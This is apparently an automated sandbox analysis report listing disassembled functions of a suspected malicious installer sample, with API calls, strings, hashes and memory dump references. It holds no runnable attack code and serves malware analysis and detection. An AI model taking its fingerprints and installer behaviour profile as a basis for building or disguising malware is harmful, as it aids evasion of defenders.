                                                      • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                      • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                      • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                      • wsprintfW.USER32 ref: 00402FEA
                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                      • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                      • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                      • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                      • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                      • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                      • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                      • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404EAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                      • wsprintfW.USER32 ref: 00404F58
                                                      • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$H/B
                                                      • API String ID: 3540041739-2222257793
                                                      • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                      • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                      • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                      • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseEnum$DeleteValue
                                                      • String ID:
                                                      • API String ID: 1354259210-0
                                                      • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                      • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                      • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                      • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                      • GetClientRect.USER32(?,?), ref: 00401DEA
                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                      • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                      • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                      • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                      • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                      • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                      • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                      • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(distributed\Ristingets\,00000023,00000011,00000002), ref: 004024DA
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 0040251A
                                                      • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseValuelstrlen
                                                      • String ID: distributed\Ristingets\
                                                      • API String ID: 2655323295-4223474621
                                                      • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                      • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                      • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                      • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405F51 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405F73
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-3081826266
                                                      • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                      • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                      • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                      • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenA.KERNEL32(afsmitningernes), ref: 0040269A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: afsmitningernes$distributed\Ristingets\
                                                      • API String ID: 1659193697-3641217871
                                                      • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                      • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                      • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                      • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040567B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 004056AA
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                        • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                      • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                      • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                      • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,004067C1,80000002), ref: 00406596
                                                      • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID: : Completed
                                                      • API String ID: 3356406503-2954849223
                                                      • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                      • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                      • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                      • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

